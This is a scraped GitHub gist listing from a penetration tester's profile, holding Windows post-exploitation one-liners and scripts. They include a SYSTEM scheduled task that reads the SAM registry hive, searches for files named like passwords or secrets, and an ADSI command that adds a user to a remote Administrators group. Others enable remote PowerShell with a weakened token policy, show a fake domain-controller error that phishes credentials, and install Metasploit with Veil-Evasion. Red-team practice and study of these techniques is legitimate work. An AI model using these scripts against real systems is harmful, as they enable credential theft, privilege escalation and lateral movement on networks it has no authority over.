Skip to content

Instantly share code, notes, and snippets.

Avatar
💭
geeking out about Kerberos

Will HarmJ0y

💭
geeking out about Kerberos
View GitHub Profile
@HarmJ0y
HarmJ0y / findsid.bat
Last active Aug 29, 2015
Win7 Powershell SID Enumeration
View findsid.bat
schtasks /create /tn GetSid /tr "powershell.exe -c '$k=Get-Item HKLM:\security\sam\domains\account;$v=Get-ItemProperty $k.pspath;New-Object System.Security.Principal.SecurityIdentifier([Byte[]]$v.V[-24..-1],0)|Format-List *|Out-File c:\sid.txt'" /sc minute /ru System /MO 1 & choice /C X /T 60 /D X > nul & schtasks /delete /tn GetSid /f
View Powershell-File-Listings.txt
# all files in sortable csv
powershell.exe -command "get-childitem .\ -rec -ErrorAction SilentlyContinue | where {!$_.PSIsContainer} | select-object FullName, @{Name='Owner';Expression={(Get-Acl $_.FullName).Owner}}, LastAccessTime, LastWriteTime, Length | export-csv -notypeinformation -path files.csv"
# grep for specific file types
powershell.exe -command "get-childitem .\ -rec -ErrorAction SilentlyContinue -include @('*.doc*','*.xls*','*.pdf')|where{!$_.PSIsContainer}|select-object FullName,@{Name='Owner';Expression={(Get-Acl $_.FullName).Owner}},LastAccessTime,LastWriteTime,Length|export-csv -notypeinformation -path files.csv"
# grep for specific key words in file names
powershell.exe -command "get-childitem .\ -rec -ErrorAction SilentlyContinue -include @('*password*','*sensitive*','*secret*')|where{!$_.PSIsContainer}|select-object FullName,@{Name='Owner';Expression={(Get-Acl $_.FullName).Owner}},LastAccessTime,LastWriteTime,Length|export-csv -notypeinformation -path files.csv"
@HarmJ0y
HarmJ0y / gist:fd98c4f16575ba28c091
Last active Apr 7, 2020
Powershell ADSI tricks
View gist:fd98c4f16575ba28c091
# Add a domain user to a remote server local group, if your current user has admin over the remote machine
powershell -c ([ADSI]'WinNT://SERVER/Administrators,group').add('WinNT://DOMAIN/USER,user')
# Get all local groups on a remote server
powershell -c "([ADSI]'WinNT://SERVER,computer').psbase.children | where { $_.psbase.schemaClassName -eq 'group' } | foreach { ($_.name)[0]}"
# Find members of the local Administrators group on a remote server
powershell -c "$([ADSI]'WinNT://SERVER/Administrators,group').psbase.Invoke('Members') | foreach { $_.GetType().InvokeMember('ADspath', 'GetProperty', $null, $_, $null).Replace('WinNT://', '') }"
# Enable the local Administrator account on a remote server
@HarmJ0y
HarmJ0y / psremoting.ps1
Last active Oct 31, 2017
Enable PSRemoting
View psremoting.ps1
#Run winrm quickconfig defaults
echo Y | winrm quickconfig
#Run enable psremoting command with defaults
Enable-PSRemoting -force
# adjust local token filter policy
Set-ItemProperty –Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System –Name LocalAccountTokenFilterPolicy –Value 1 -Type DWord
#Enabled Trusted Hosts for Universial Access
@HarmJ0y
HarmJ0y / ubuntu_veil_evasion_setup.sh
Last active Mar 3, 2020
This short script will install Metasploit as well as Veil-Evasion on Ubuntu
View ubuntu_veil_evasion_setup.sh
#!/bin/bash
sudo apt-get install git
cd /tmp/
git clone https://github.com/darkoperator/MSF-Installer.git
cd MSF-Installer
sudo ./msf_install.sh -i
source ~/.bashrc
sudo chmod 0666 /usr/local/share/metasploit-framework/log/production.log
View prompt.ps1
# Stolen/adapted from http://blog.logrhythm.com/security/do-you-trust-your-computer/
# POC from greg.foss[at]owasp.org
function prompt {
Add-Type -AssemblyName Microsoft.VisualBasic
[Microsoft.VisualBasic.Interaction]::MsgBox('Lost contact with the Domain Controller.', 'OKOnly,MsgBoxSetForeground,SystemModal,Critical', 'ERROR - 0xA801B720')
$c=[System.Security.Principal.WindowsIdentity]::GetCurrent().name
$credential = $host.ui.PromptForCredential("Credentials Required", "Please enter your user name and password.", $c, "NetBiosUserName")
@HarmJ0y
HarmJ0y / random.ps1
Last active May 21, 2018
random data file one-liner
View random.ps1
$megs=1000;$w=New-Object IO.streamWriter $env:temp\data.dat;[char[]]$c='azertyuiopqsdfghjklmwxcvbnAZERTYUIOPQSDFGHJKLMWXCVBN0123456789-_';1..$megs|ForEach-Object{1..4|ForEach-Object{$r=$c|Get-Random -Count $c.Count;$s=-join $r;$w.Write($s*4kb);}};
@HarmJ0y
HarmJ0y / gist:57f1dac93fcc3564f9b3
Created Oct 23, 2014
domain user to sid and sid to user
View gist:57f1dac93fcc3564f9b3
# user to SID
(New-Object System.Security.Principal.NTAccount("DOMAIN","USER")).Translate([System.Security.Principal.SecurityIdentifier]).Value
# SID to user
(New-Object System.Security.Principal.SecurityIdentifier("SID")).Translate( [System.Security.Principal.NTAccount]).Value
@HarmJ0y
HarmJ0y / trusts.csv
Created Dec 29, 2014
Simple Domain Trust Output
View trusts.csv
SourceDomain TargetDomain TrustType TrustDirection
finance.mothership.com mothership.com ParentChild Bidirectional
mothership.com corp.mothership.com ParentChild Bidirectional
mothership.com finance.mothership.com ParentChild Bidirectional
mothership.com engineering.mothership.com ParentChild Bidirectional
corp.mothership.com mothership.com ParentChild Bidirectional
corp.mothership.com subsidiary.com External Inbound
finance.mothership.com mothership.com ParentChild Bidirectional
engineering.mothership.com mothership.com ParentChild Bidirectional
subsidiary.com product.subsidiary.com ParentChild Bidirectional
@HarmJ0y
HarmJ0y / trusts_complex.csv
Created Dec 29, 2014
More Complex Domain Trust Example
View trusts_complex.csv
SourceDomain TargetDomain TrustType TrustDirection
finance.mothership.com mothership.com ParentChild Bidirectional
mothership.com corp.mothership.com ParentChild Bidirectional
mothership.com finance.mothership.com ParentChild Bidirectional
mothership.com contracts.mothership.com ParentChild Bidirectional
corp.mothership.com mothership.com ParentChild Bidirectional
contracts.mothership.com mothership.com ParentChild Bidirectional
contracts.mothership.com product.othercompany.com External Inbound
product.othercompany.com contracts.mothership.com External Outbound
product.othercompany.com othercompany.com ParentChild Bidirectional
You can’t perform that action at this time.